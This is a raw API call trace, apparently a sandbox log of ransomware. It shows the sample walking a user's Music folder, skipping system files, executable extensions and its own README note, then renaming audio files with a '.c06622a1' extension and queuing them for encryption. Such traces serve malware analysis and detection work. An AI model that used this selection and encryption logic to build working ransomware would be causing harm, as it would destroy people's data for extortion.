MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\hdD2hC_-Ra.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah\\hdd2hc_-ra.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\hdD2hC_-Ra.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah\\hdd2hc_-ra.wav.c06622a1"), dwFlags=0x8) returned 1 [0160.386] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\hdD2hC_-Ra.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah\\hdd2hc_-ra.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e8 [0160.386] CreateIoCompletionPort (FileHandle=0x1e8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0160.386] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3cf0020 [0160.394] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x28664313 [0160.394] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x30f0e824 [0160.394] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x31c0d182 [0160.394] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x285d491 [0160.394] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x28b017d [0160.394] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x196a179 [0160.394] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x76c21642 [0160.394] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x74adc899 [0160.397] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3cf0094, Length=0x80) returned 0x26bc1560 [0160.397] RtlComputeCrc32 (PartialCrc=0x1560, Buffer=0x3cf0094, Length=0x80) returned 0x2b1b2fc8 [0160.397] RtlComputeCrc32 (PartialCrc=0x2fc8, Buffer=0x3cf0094, Length=0x80) returned 0xc9809c91 [0160.397] RtlComputeCrc32 (PartialCrc=0x9c91, Buffer=0x3cf0094, Length=0x80) returned 0xff5cd4ac [0160.397] RtlComputeCrc32 (PartialCrc=0xd4ac, Buffer=0x3cf0094, Length=0x80) returned 0x9779b771 [0160.397] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3cf0020) returned 1 [0160.397] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a2090) returned 1 [0160.397] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b2098) returned 1 [0160.398] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d1d7c30, ftCreationTime.dwHighDateTime=0x1d5e4da, ftLastAccessTime.dwLowDateTime=0xc48ec650, ftLastAccessTime.dwHighDateTime=0x1d5e2ef, ftLastWriteTime.dwLowDateTime=0xc48ec650, ftLastWriteTime.dwHighDateTime=0x1d5e2ef, nFileSizeHigh=0x0, nFileSizeLow=0x6be, dwReserved0=0x0, dwReserved1=0x0, cFileName="O EQb6BgtJHtRIydzqK4.mp3", cAlternateFileName="OEQB6B~1.MP3")) returned 1 [0160.398] _wcsicmp (_Str1="O EQb6BgtJHtRIydzqK4.mp3", _Str2="README.c06622a1.TXT") returned -3 [0160.398] wcsstr (_Str="O EQb6BgtJHtRIydzqK4.mp3", _SubStr="README") returned 0x0 [0160.398] _wcsicmp (_Str1="autorun.inf", _Str2="O EQb6BgtJHtRIydzqK4.mp3") returned -14 [0160.398] wcslen (_String="autorun.inf") returned 0xb [0160.398] _wcsicmp (_Str1="boot.ini", _Str2="O EQb6BgtJHtRIydzqK4.mp3") returned -13 [0160.398] wcslen (_String="boot.ini") returned 0x8 [0160.398] _wcsicmp (_Str1="bootfont.bin", _Str2="O EQb6BgtJHtRIydzqK4.mp3") returned -13 [0160.398] wcslen (_String="bootfont.bin") returned 0xc [0160.398] _wcsicmp (_Str1="bootsect.bak", _Str2="O EQb6BgtJHtRIydzqK4.mp3") returned -13 [0160.398] wcslen (_String="bootsect.bak") returned 0xc [0160.398] _wcsicmp (_Str1="desktop.ini", _Str2="O EQb6BgtJHtRIydzqK4.mp3") returned -11 [0160.398] wcslen (_String="desktop.ini") returned 0xb [0160.398] _wcsicmp (_Str1="iconcache.db", _Str2="O EQb6BgtJHtRIydzqK4.mp3") returned -6 [0160.398] wcslen (_String="iconcache.db") returned 0xc [0160.398] _wcsicmp (_Str1="ntldr", _Str2="O EQb6BgtJHtRIydzqK4.mp3") returned -1 [0160.398] wcslen (_String="ntldr") returned 0x5 [0160.398] _wcsicmp (_Str1="ntuser.dat", _Str2="O EQb6BgtJHtRIydzqK4.mp3") returned -1 [0160.398] wcslen (_String="ntuser.dat") returned 0xa [0160.398] _wcsicmp (_Str1="ntuser.dat.log", _Str2="O EQb6BgtJHtRIydzqK4.mp3") returned -1 [0160.398] wcslen (_String="ntuser.dat.log") returned 0xe [0160.398] _wcsicmp (_Str1="ntuser.ini", _Str2="O EQb6BgtJHtRIydzqK4.mp3") returned -1 [0160.398] wcslen (_String="ntuser.ini") returned 0xa [0160.398] _wcsicmp (_Str1="thumbs.db", _Str2="O EQb6BgtJHtRIydzqK4.mp3") returned 5 [0160.398] wcslen (_String="thumbs.db") returned 0x9 [0160.398] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0160.398] wcslen (_String="386") returned 0x3 [0160.398] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0160.398] wcslen (_String="adv") returned 0x3 [0160.399] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0160.399] wcslen (_String="ani") returned 0x3 [0160.399] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0160.399] wcslen (_String="bat") returned 0x3 [0160.399] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0160.399] wcslen (_String="bin") returned 0x3 [0160.399] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0160.399] wcslen (_String="cab") returned 0x3 [0160.399] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0160.399] wcslen (_String="cmd") returned 0x3 [0160.399] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0160.399] wcslen (_String="com") returned 0x3 [0160.399] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0160.399] wcslen (_String="cpl") returned 0x3 [0160.399] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0160.399] wcslen (_String="cur") returned 0x3 [0160.399] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0160.399] wcslen (_String="deskthemepack") returned 0xd [0160.399] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0160.399] wcslen (_String="diagcab") returned 0x7 [0160.399] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0160.399] wcslen (_String="diagcfg") returned 0x7 [0160.399] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0160.399] wcslen (_String="diagpkg") returned 0x7 [0160.399] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0160.399] wcslen (_String="dll") returned 0x3 [0160.399] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0160.399] wcslen (_String="drv") returned 0x3 [0160.399] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0160.399] wcslen (_String="exe") returned 0x3 [0160.400] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0160.400] wcslen (_String="hlp") returned 0x3 [0160.400] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0160.400] wcslen (_String="icl") returned 0x3 [0160.400] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0160.400] wcslen (_String="icns") returned 0x4 [0160.400] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0160.400] wcslen (_String="ico") returned 0x3 [0160.400] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0160.400] wcslen (_String="ics") returned 0x3 [0160.400] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0160.400] wcslen (_String="idx") returned 0x3 [0160.400] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0160.400] wcslen (_String="ldf") returned 0x3 [0160.400] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0160.400] wcslen (_String="lnk") returned 0x3 [0160.400] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0160.400] wcslen (_String="mod") returned 0x3 [0160.400] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0160.400] wcslen (_String="mpa") returned 0x3 [0160.400] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0160.400] wcslen (_String="msc") returned 0x3 [0160.400] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0160.400] wcslen (_String="msp") returned 0x3 [0160.400] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0160.400] wcslen (_String="msstyles") returned 0x8 [0160.400] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0160.400] wcslen (_String="msu") returned 0x3 [0160.400] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0160.401] wcslen (_String="nls") returned 0x3 [0160.401] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0160.401] wcslen (_String="nomedia") returned 0x7 [0160.401] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0160.401] wcslen (_String="ocx") returned 0x3 [0160.401] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0160.401] wcslen (_String="prf") returned 0x3 [0160.401] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0160.401] wcslen (_String="ps1") returned 0x3 [0160.401] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0160.401] wcslen (_String="rom") returned 0x3 [0160.401] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0160.401] wcslen (_String="rtp") returned 0x3 [0160.401] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0160.401] wcslen (_String="scr") returned 0x3 [0160.401] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0160.401] wcslen (_String="shs") returned 0x3 [0160.401] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0160.401] wcslen (_String="spl") returned 0x3 [0160.401] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0160.401] wcslen (_String="sys") returned 0x3 [0160.401] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0160.401] wcslen (_String="theme") returned 0x5 [0160.401] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0160.401] wcslen (_String="themepack") returned 0x9 [0160.401] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0160.401] wcslen (_String="wpx") returned 0x3 [0160.401] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0160.401] wcslen (_String="lock") returned 0x4 [0160.401] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0160.402] wcslen (_String="key") returned 0x3 [0160.402] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0160.402] wcslen (_String="hta") returned 0x3 [0160.402] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0160.402] wcslen (_String="msi") returned 0x3 [0160.402] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0160.402] wcslen (_String="pdb") returned 0x3 [0160.402] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0160.402] wcslen (_String="sqlite") returned 0x6 [0160.402] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah")) returned 0x10 [0160.402] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a2090 [0160.402] wcscpy (in: _Dest=0x32a2090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH" [0160.402] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH") returned 0x4c [0160.402] wcscpy (in: _Dest=0x32a212a, _Source="O EQb6BgtJHtRIydzqK4.mp3" | out: _Dest="O EQb6BgtJHtRIydzqK4.mp3") returned="O EQb6BgtJHtRIydzqK4.mp3" [0160.402] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\O EQb6BgtJHtRIydzqK4.mp3", dwFileAttributes=0x80) returned 1 [0160.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\O EQb6BgtJHtRIydzqK4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah\\o eqb6bgtjhtriydzqk4.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0160.426] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.426] ReadFile (in: hFile=0x1e4, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0160.427] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x679d9949 [0160.427] RtlComputeCrc32 (PartialCrc=0x9949, Buffer=0x32e4a4, Length=0x80) returned 0x4f2ab748 [0160.427] RtlComputeCrc32 (PartialCrc=0xb748, Buffer=0x32e4a4, Length=0x80) returned 0x2b559d9c [0160.427] RtlComputeCrc32 (PartialCrc=0x9d9c, Buffer=0x32e4a4, Length=0x80) returned 0x64f1c76d [0160.427] RtlComputeCrc32 (PartialCrc=0xc76d, Buffer=0x32e4a4, Length=0x80) returned 0xba26e809 [0160.427] CloseHandle (hObject=0x1e4) returned 1 [0160.427] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b2098 [0160.427] wcscpy (in: _Dest=0x32b2098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\O EQb6BgtJHtRIydzqK4.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\O EQb6BgtJHtRIydzqK4.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\O EQb6BgtJHtRIydzqK4.mp3" [0160.427] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\O EQb6BgtJHtRIydzqK4.mp3") returned 0x65 [0160.428] wcscpy (in: _Dest=0x32b2162, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.428] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\O EQb6BgtJHtRIydzqK4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah\\o eqb6bgtjhtriydzqk4.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\O EQb6BgtJHtRIydzqK4.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah\\o eqb6bgtjhtriydzqk4.mp3.c06622a1"), dwFlags=0x8) returned 1 [0160.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\Vrm8P aH\\O EQb6BgtJHtRIydzqK4.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\vrm8p ah\\o eqb6bgtjhtriydzqk4.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e4 [0160.441] CreateIoCompletionPort (FileHandle=0x1e4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0160.441] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3d80020 [0160.448] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x504c4a41 [0160.448] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x43b0f6ee [0160.448] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x46554250 [0160.448] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x182525b4 [0160.448] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xf2a7912 [0160.448] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1646463c [0160.448] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x262d2ae1 [0160.448] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x89b4d67 [0160.451] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3d80094, Length=0x80) returned 0x111051b7 [0160.451] RtlComputeCrc32 (PartialCrc=0x51b7, Buffer=0x3d80094, Length=0x80) returned 0x6352e56b [0160.451] RtlComputeCrc32 (PartialCrc=0xe56b, Buffer=0x3d80094, Length=0x80) returned 0x4238301b [0160.451] RtlComputeCrc32 (PartialCrc=0x301b, Buffer=0x3d80094, Length=0x80) returned 0x165d143a [0160.451] RtlComputeCrc32 (PartialCrc=0x143a, Buffer=0x3d80094, Length=0x80) returned 0x36f2a642 [0160.451] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3d80020) returned 1 [0160.451] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a2090) returned 1 [0160.451] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b2098) returned 1 [0160.451] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d4235c0, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8d4235c0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8d4235c0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0160.451] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0160.451] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0160.452] FindClose (in: hFindFile=0x154208 | out: hFindFile=0x154208) returned 1 [0160.452] _wcsicmp (_Str1="backup", _Str2="Vrm8P aH") returned -20 [0160.452] wcslen (_String="backup") returned 0x6 [0160.452] _wcsicmp (_Str1="bak", _Str2="Vrm8P aH") returned -20 [0160.452] wcslen (_String="bak") returned 0x3 [0160.452] _wcsicmp (_Str1="back", _Str2="Vrm8P aH") returned -20 [0160.452] wcslen (_String="back") returned 0x4 [0160.452] _wcsicmp (_Str1="archive", _Str2="Vrm8P aH") returned -21 [0160.452] wcslen (_String="archive") returned 0x7 [0160.452] _wcsicmp (_Str1="bckp", _Str2="Vrm8P aH") returned -20 [0160.452] wcslen (_String="bckp") returned 0x4 [0160.452] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3272078) returned 1 [0160.453] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0160.454] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9218fa20, ftCreationTime.dwHighDateTime=0x1d5def2, ftLastAccessTime.dwLowDateTime=0xd7bde5c0, ftLastAccessTime.dwHighDateTime=0x1d5deae, ftLastWriteTime.dwLowDateTime=0xd7bde5c0, ftLastWriteTime.dwHighDateTime=0x1d5deae, nFileSizeHigh=0x0, nFileSizeLow=0x18350, dwReserved0=0x0, dwReserved1=0x0, cFileName="XUJXgdHcT7y1.wav", cAlternateFileName="XUJXGD~1.WAV")) returned 1 [0160.454] _wcsicmp (_Str1="XUJXgdHcT7y1.wav", _Str2="README.c06622a1.TXT") returned 6 [0160.454] wcsstr (_Str="XUJXgdHcT7y1.wav", _SubStr="README") returned 0x0 [0160.455] _wcsicmp (_Str1="autorun.inf", _Str2="XUJXgdHcT7y1.wav") returned -23 [0160.455] wcslen (_String="autorun.inf") returned 0xb [0160.455] _wcsicmp (_Str1="boot.ini", _Str2="XUJXgdHcT7y1.wav") returned -22 [0160.455] wcslen (_String="boot.ini") returned 0x8 [0160.455] _wcsicmp (_Str1="bootfont.bin", _Str2="XUJXgdHcT7y1.wav") returned -22 [0160.455] wcslen (_String="bootfont.bin") returned 0xc [0160.455] _wcsicmp (_Str1="bootsect.bak", _Str2="XUJXgdHcT7y1.wav") returned -22 [0160.455] wcslen (_String="bootsect.bak") returned 0xc [0160.455] _wcsicmp (_Str1="desktop.ini", _Str2="XUJXgdHcT7y1.wav") returned -20 [0160.455] wcslen (_String="desktop.ini") returned 0xb [0160.455] _wcsicmp (_Str1="iconcache.db", _Str2="XUJXgdHcT7y1.wav") returned -15 [0160.455] wcslen (_String="iconcache.db") returned 0xc [0160.455] _wcsicmp (_Str1="ntldr", _Str2="XUJXgdHcT7y1.wav") returned -10 [0160.455] wcslen (_String="ntldr") returned 0x5 [0160.455] _wcsicmp (_Str1="ntuser.dat", _Str2="XUJXgdHcT7y1.wav") returned -10 [0160.455] wcslen (_String="ntuser.dat") returned 0xa [0160.455] _wcsicmp (_Str1="ntuser.dat.log", _Str2="XUJXgdHcT7y1.wav") returned -10 [0160.455] wcslen (_String="ntuser.dat.log") returned 0xe [0160.455] _wcsicmp (_Str1="ntuser.ini", _Str2="XUJXgdHcT7y1.wav") returned -10 [0160.455] wcslen (_String="ntuser.ini") returned 0xa [0160.455] _wcsicmp (_Str1="thumbs.db", _Str2="XUJXgdHcT7y1.wav") returned -4 [0160.455] wcslen (_String="thumbs.db") returned 0x9 [0160.455] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0160.455] wcslen (_String="386") returned 0x3 [0160.455] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0160.455] wcslen (_String="adv") returned 0x3 [0160.455] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0160.455] wcslen (_String="ani") returned 0x3 [0160.455] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0160.455] wcslen (_String="bat") returned 0x3 [0160.455] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0160.455] wcslen (_String="bin") returned 0x3 [0160.455] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0160.456] wcslen (_String="cab") returned 0x3 [0160.456] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0160.456] wcslen (_String="cmd") returned 0x3 [0160.456] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0160.456] wcslen (_String="com") returned 0x3 [0160.456] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0160.456] wcslen (_String="cpl") returned 0x3 [0160.456] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0160.456] wcslen (_String="cur") returned 0x3 [0160.456] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0160.456] wcslen (_String="deskthemepack") returned 0xd [0160.456] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0160.456] wcslen (_String="diagcab") returned 0x7 [0160.456] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0160.456] wcslen (_String="diagcfg") returned 0x7 [0160.456] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0160.456] wcslen (_String="diagpkg") returned 0x7 [0160.456] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0160.456] wcslen (_String="dll") returned 0x3 [0160.456] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0160.456] wcslen (_String="drv") returned 0x3 [0160.456] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0160.456] wcslen (_String="exe") returned 0x3 [0160.456] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0160.456] wcslen (_String="hlp") returned 0x3 [0160.456] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0160.456] wcslen (_String="icl") returned 0x3 [0160.456] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0160.456] wcslen (_String="icns") returned 0x4 [0160.456] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0160.456] wcslen (_String="ico") returned 0x3 [0160.457] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0160.457] wcslen (_String="ics") returned 0x3 [0160.457] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0160.457] wcslen (_String="idx") returned 0x3 [0160.457] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0160.457] wcslen (_String="ldf") returned 0x3 [0160.457] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0160.457] wcslen (_String="lnk") returned 0x3 [0160.457] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0160.457] wcslen (_String="mod") returned 0x3 [0160.457] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0160.457] wcslen (_String="mpa") returned 0x3 [0160.457] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0160.457] wcslen (_String="msc") returned 0x3 [0160.457] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0160.457] wcslen (_String="msp") returned 0x3 [0160.457] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0160.457] wcslen (_String="msstyles") returned 0x8 [0160.457] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0160.457] wcslen (_String="msu") returned 0x3 [0160.457] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0160.457] wcslen (_String="nls") returned 0x3 [0160.457] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0160.457] wcslen (_String="nomedia") returned 0x7 [0160.457] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0160.457] wcslen (_String="ocx") returned 0x3 [0160.457] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 